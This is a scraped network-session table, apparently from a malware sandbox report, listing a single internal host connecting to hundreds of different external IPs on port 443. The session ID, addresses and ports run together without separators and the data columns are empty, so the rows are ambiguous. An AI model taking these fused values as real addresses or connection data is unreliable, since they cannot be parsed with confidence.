                              10375192.168.2.133989482.22.239.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10376192.168.2.134308425.244.174.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10377192.168.2.134650085.118.84.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10378192.168.2.134340094.129.219.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10379192.168.2.134693845.75.101.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10380192.168.2.1352854159.177.23.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10381192.168.2.135014841.113.126.238443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10382192.168.2.135642618.232.143.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10383192.168.2.1360024185.145.120.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10384192.168.2.134104492.81.90.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10385192.168.2.134382869.113.41.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10386192.168.2.135645058.78.50.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10387192.168.2.1351558220.244.54.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10388192.168.2.134152496.178.130.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10389192.168.2.134201625.223.139.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10390192.168.2.134115267.3.115.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10391192.168.2.1342648135.60.250.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10392192.168.2.1353700222.62.64.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10393192.168.2.1358698118.34.83.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10394192.168.2.1341710158.239.122.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10395192.168.2.1347284121.138.143.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10396192.168.2.1345226186.237.206.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10397192.168.2.1344174156.234.197.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10398192.168.2.135240873.134.132.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10399192.168.2.1333182157.82.242.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10400192.168.2.1336020158.193.39.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10401192.168.2.133922250.157.255.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10402192.168.2.135003638.108.44.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10403192.168.2.1352094121.216.201.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10404192.168.2.1335934120.210.109.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10405192.168.2.13461585.193.112.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10406192.168.2.134869652.177.164.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10407192.168.2.133440814.147.73.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10408192.168.2.1358186131.182.167.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10409192.168.2.135751660.32.173.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10410192.168.2.1353178188.93.49.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10411192.168.2.135489087.221.4.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10412192.168.2.1347288158.47.89.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10413192.168.2.135787842.189.96.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10414192.168.2.1347396187.167.151.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10415192.168.2.134642620.47.184.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10416192.168.2.1354200107.86.200.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10417192.168.2.1357674167.110.253.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10418192.168.2.135505088.149.153.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10419192.168.2.134447617.187.97.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10420192.168.2.135697267.47.70.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10421192.168.2.1355462153.27.70.252443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10422192.168.2.1345020205.22.22.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10423192.168.2.1360294136.36.115.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10424192.168.2.134526086.116.17.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10425192.168.2.1344388160.19.137.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10426192.168.2.1334812208.91.208.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10427192.168.2.1338352152.40.205.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10428192.168.2.1352648158.118.191.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10429192.168.2.1347592182.192.200.66443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10430192.168.2.133804497.151.47.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10431192.168.2.1354896157.173.190.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10432192.168.2.1346998114.161.147.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10433192.168.2.133641627.78.206.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10434192.168.2.135622259.53.159.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10435192.168.2.1342698105.55.110.27443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10436192.168.2.134701098.155.118.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10437192.168.2.134879674.165.184.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10438192.168.2.1354262145.36.140.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10439192.168.2.135784438.27.76.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10440192.168.2.1333126190.0.73.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10441192.168.2.13455989.181.152.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10442192.168.2.1341226117.137.93.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10443192.168.2.133319094.188.123.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10444192.168.2.135863460.76.139.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10445192.168.2.1351078112.129.28.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10446192.168.2.135998834.106.150.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10447192.168.2.1334032134.65.97.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10448192.168.2.1360184200.126.235.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10449192.168.2.136031031.65.182.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10450192.168.2.1360962170.87.44.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10451192.168.2.1344880178.107.158.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10452192.168.2.135543265.90.48.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10453192.168.2.1342154135.141.94.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10454192.168.2.1359348146.86.39.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10455192.168.2.1339824212.148.195.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10456192.168.2.1356924105.36.146.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10457192.168.2.1348212110.165.203.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10458192.168.2.1359870117.116.41.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10459192.168.2.1339246154.82.161.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10460192.168.2.1360044102.140.218.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10461192.168.2.1337330117.13.45.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10462192.168.2.1354596182.48.117.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10463192.168.2.134554239.17.90.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10464192.168.2.1349676157.255.1.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10465192.168.2.1352010145.158.102.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10466192.168.2.136045087.102.44.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10467192.168.2.1350532124.89.243.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10468192.168.2.1350420205.123.165.5443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10469192.168.2.1352088151.123.194.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10470192.168.2.1359474197.177.14.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10471192.168.2.1360264114.7.143.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10472192.168.2.134440039.103.49.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10473192.168.2.133835481.132.81.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10474192.168.2.134261257.197.0.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10475192.168.2.133463247.58.111.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10476192.168.2.1351134216.62.29.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10477192.168.2.135456894.99.181.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10478192.168.2.1332782135.129.215.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10479192.168.2.13569702.67.41.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10480192.168.2.135034899.201.177.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10481192.168.2.1344198209.14.95.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10482192.168.2.1353708166.229.144.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10483192.168.2.1355082161.52.75.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10484192.168.2.134818065.237.241.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10485192.168.2.134984644.26.162.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10486192.168.2.1347062148.243.232.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10487192.168.2.1360280107.7.187.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10488192.168.2.134958853.107.232.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10489192.168.2.135312083.217.99.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10490192.168.2.1353448210.68.6.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10491192.168.2.1359858112.147.221.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10492192.168.2.1352080123.154.2.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10493192.168.2.1350100117.247.203.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10494192.168.2.1350444122.162.25.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10495192.168.2.133707220.79.79.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10496192.168.2.1348002193.35.134.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10497192.168.2.1353116112.152.67.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10498192.168.2.1351110159.140.23.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10499192.168.2.1335474176.120.101.93443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10500192.168.2.1351400178.184.36.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10501192.168.2.1337102104.239.5.205443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10502192.168.2.1359250129.204.79.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10503192.168.2.1355884188.32.211.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10504192.168.2.135318283.227.62.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10505192.168.2.13392124.101.240.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10506192.168.2.1355832216.245.224.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10507192.168.2.1354624160.200.111.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10508192.168.2.135469860.252.149.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10509192.168.2.1334038206.6.11.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10510192.168.2.1338368165.6.252.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10511192.168.2.1352062138.178.84.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10512192.168.2.1353432198.207.102.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10513192.168.2.1358288142.112.136.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10514192.168.2.13491921.100.124.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10515192.168.2.134965654.208.88.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10516192.168.2.1342308180.199.186.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10517192.168.2.133656876.0.162.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10518192.168.2.1354440151.145.126.171443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10519192.168.2.1346126132.209.254.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10520192.168.2.134881635.225.61.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10521192.168.2.1349570116.113.104.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10522192.168.2.134161613.116.111.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10523192.168.2.134826695.67.25.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10524192.168.2.133460242.242.114.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10525192.168.2.134652293.157.63.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10526192.168.2.135365877.196.131.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10527192.168.2.1351746132.19.13.200443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10528192.168.2.1337288153.169.196.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10529192.168.2.1351778140.255.121.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10530192.168.2.135431038.48.134.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10531192.168.2.1350574136.188.125.173443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10532192.168.2.135661472.18.139.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10533192.168.2.1339448184.118.80.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10534192.168.2.1357154167.88.2.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10535192.168.2.1334040118.166.23.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10536192.168.2.1350786221.157.245.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10537192.168.2.1336550121.234.81.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10538192.168.2.1352016213.195.176.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10539192.168.2.1352788198.218.71.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10540192.168.2.13507501.165.82.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10541192.168.2.134583857.195.205.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10542192.168.2.1354558163.135.179.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10543192.168.2.135323669.244.147.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10544192.168.2.1338382122.149.86.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10545192.168.2.1358938172.238.176.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10546192.168.2.134721470.210.255.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10547192.168.2.1351034218.7.3.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10548192.168.2.1346940106.55.71.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10549192.168.2.1350728134.186.108.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10550192.168.2.133841227.108.243.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10551192.168.2.1358738174.129.42.119443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10552192.168.2.1346578223.151.148.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10553192.168.2.1352026210.133.166.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10554192.168.2.1333828187.29.39.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10555192.168.2.134862891.191.148.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10556192.168.2.1345482141.216.184.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10557192.168.2.1350930115.148.213.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10558192.168.2.1355934136.190.150.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10559192.168.2.134107664.137.34.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10560192.168.2.133591214.2.10.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10561192.168.2.133410852.175.33.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10562192.168.2.1356980179.207.58.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10563192.168.2.1359582134.143.252.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10564192.168.2.1348754162.110.153.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10565192.168.2.133912666.203.125.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10566192.168.2.1346582186.120.224.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10567192.168.2.1356322221.248.27.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10568192.168.2.133827871.37.148.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10569192.168.2.1358670100.138.28.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10570192.168.2.1333358182.201.42.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10571192.168.2.1355898177.222.237.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10572192.168.2.1358372164.4.38.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10573192.168.2.133771820.39.215.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10574192.168.2.134818631.235.93.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10575192.168.2.134956818.125.82.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10576192.168.2.1338990213.142.232.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10577192.168.2.135134242.255.52.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10578192.168.2.133512840.248.13.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10579192.168.2.135972471.210.76.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10580192.168.2.133752861.238.126.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10581192.168.2.134574485.197.130.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10582192.168.2.1351432198.215.251.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10583192.168.2.1349578183.107.64.239443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10584192.168.2.1354000161.35.14.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10585192.168.2.134559095.125.24.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10586192.168.2.1349358131.148.243.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10587192.168.2.1346652187.75.31.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10588192.168.2.1345462211.226.32.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10589192.168.2.1350336178.19.3.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10590192.168.2.1358214204.89.56.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10591192.168.2.1352784189.129.201.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10592192.168.2.1357228117.254.154.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10593192.168.2.1348180142.247.189.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10594192.168.2.13533725.50.185.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10595192.168.2.1332928185.94.163.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10596192.168.2.1340810163.175.27.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10597192.168.2.1350760160.10.150.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10598192.168.2.13455065.65.17.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10599192.168.2.1353584213.21.155.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10600192.168.2.134598089.30.176.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10601192.168.2.1340304203.186.123.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10602192.168.2.1340168100.223.246.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10603192.168.2.1353098189.180.55.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10604192.168.2.1339180131.119.26.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10605192.168.2.135175472.240.164.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10606192.168.2.1343198155.172.241.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
